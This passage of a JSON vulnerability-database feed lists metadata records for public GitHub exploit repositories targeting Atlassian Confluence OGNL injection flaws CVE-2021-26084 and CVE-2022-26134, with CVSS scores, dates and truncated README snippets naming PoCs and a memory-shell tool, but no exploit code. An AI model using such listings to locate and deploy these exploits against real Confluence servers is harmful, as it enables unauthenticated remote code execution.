{"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:34:51", "description": "# CVE-2021-26084-Confluence-OGNL\nasjhdsajdlksavksapfokaajsdlksaj...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-06T06:55:15", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2021-09-06T06:58:34", "id": "C58D4A9D-FE17-5F41-8B1B-800E327BB411", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:36:37", "description": "# Confluence Server Webwork Pre-Auth OGNL Injection (CVE-2021-26...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-02T03:11:50", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2021-10-02T03:16:43", "id": "CE477D7E-7586-5C82-8DCC-033C48461E66", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-25T03:02:01", "description": "# CVE-2021-26084\n\nCVE-2021-26084 Remote Code Execution on Conflu...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-01T09:50:26", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2022-07-25T01:08:52", "id": "24774A85-D9E4-55DC-8D1F-EC48351B23C1", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-10T20:53:20", "description": "# CVE-2021-26084\nProof of concept for CVE-2021-26084. \n\nConfluen...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-01T15:19:19", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2022-05-25T14:48:53", "id": "BFA4DC64-759A-5113-842C-923C98D12B44", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-15T21:40:16", "description": "# CVE-2021-26084 - Confluence Server Webwork OGNL injection\n\n- A...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-01T07:15:17", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2022-08-15T15:41:32", "id": "1E5E573E-3F0A-5243-BE87-314E2BDC4107", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-01-13T09:42:12", "description": "# CVE-2021-26084 (PoC) | Confluence Server Webwork OGNL injectio...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-31T23:33:44", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2022-01-13T08:40:52", "id": "45606E7F-5EF6-5B64-B81C-F4C556A8DE08", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-12-03T21:38:33", "description": "* CVE-2021-26084\n--------\n** Description\n - POC of CVE-2021-2...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-01-13T06:29:51", "type": "githubexploit", "title": "Exploit for Expression Language Injection in Atlassian Confluence Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2023-09-28T11:35:00", "id": "C0A9F032-9822-59DC-94CC-20C15DEE0FED", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-23T20:11:29", "description": "# 0DAYEXPLOITAtlassianConfluenceCVE-2022-26134\n\nCVE-2022-26134 -...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-07T19:59:55", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-08-23T17:24:50", "id": "66468422-89C0-5AC8-9CEA-6B512338FF7C", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-12-03T20:06:13", "description": "## ATLASSIAN-Confluence_rce\nCVE-2022-26134\n## \u5b89\u88c5\n\n```\ngit clone ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-16T09:19:56", "type": "githubexploit", "title": "Exploit for Expression Language Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-10-17T06:36:47", "id": "1F907E1E-A975-55B6-BAFC-80A32B2DDAE7", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-12-03T20:34:12", "description": "# POC - Atlassian Confluence OGNL Injection Remote Code Executio...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-24T10:33:13", "type": "githubexploit", "title": "Exploit for Expression Language Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-27T22:50:35", "id": "20BFC1D4-CB1E-51CF-82D8-E4258142BB69", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-12-03T20:39:45", "description": "# CVE-2022-26134 PoC\n\nConfluence Server and Data Center - CVE-20...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-04T10:44:38", "type": "githubexploit", "title": "Exploit for Expression Language Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2023-10-20T18:21:27", "id": "423DF4D5-60AF-5663-B196-2A67DD13D226", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-12-03T20:39:05", "description": "# CVE-2022-26134\nConfluence OGNL expression injected RCE(CVE-202...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-04T11:16:28", "type": "githubexploit", "title": "Exploit for Expression Language Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2023-11-24T20:25:47", "id": "EA88FA45-8CE7-5D7D-8E6C-B04F8392F7EB", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-12-03T20:37:49", "description": "# CVE-2022-26134-Godzilla-MEMSHELL\n\n## Usage\n```\njava -jar CVE-2...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-07T09:19:02", "type": "githubexploit", "title": "Exploit for Expression Language Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2023-11-24T16:05:36", "id": "65AEB692-CDF9-53FB-B13F-CAB5A4288606", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-09-27T23:23:37", "description": "### CVE-2022-26134 - OGNL injection vulnerability.\r\n\r\nScript pro...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-12T21:26:17", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-09-27T23:21:17", "id": "4D37AF88-23E8-5A3B-B559-7807CB07DB09", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-12-03T15:58:00", "description": "# CVE-2022-26134 PoC\n\n> [!WARNING]\n> LEGAL DISCLAIMER:\n> This to...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-09-20T19:54:05", "type": "githubexploit", "title": "Exploit for Expression Language Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2023-09-20T20:16:37", "id": "5CE439D5-2080-5145-AD7B-BF3F1FB53A0F", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-12-03T20:37:36", "description": "# ConfluentPwn\nConfluence pre-auth ONGL injection remote code ex...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-08T04:53:31", "type": "githubexploit", "title": "Exploit for Expression Language Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2023-09-28T11:39:31", "id": "83B145E2-F995-5B1C-863E-164839ED1173", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-18T09:24:55", "description": "# CVE-2021-26084\n\n- An OGNL injection vulnerability exists that ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-05T09:27:55", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2021-11-16T03:56:14", "id": "4A995433-D0C6-5BF7-9A78-962229397A7D", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-10T20:49:37", "description": "# CVE-2021-26084_PoC...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-18T07:33:24", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2021-12-01T09:03:37", "id": "2BE90BD5-68B3-521E-B2DF-923D04CC1189", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-18T09:24:16", "description": "# CVE-2021-26084 patch \n\n CVE-2021-26084 patch provided by \"Co...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-08T17:05:16", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2021-09-08T17:29:07", "id": "84D5F04A-0DDB-5788-8759-DA99D303B756", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-12-03T16:24:58", "description": "# CVE-2021-26084-EXP\r\n\r\nThis code is an exploit for the CVE-2021...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-07-03T07:31:29", "type": "githubexploit", "title": "Exploit for Expression Language Injection in Atlassian Confluence Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, 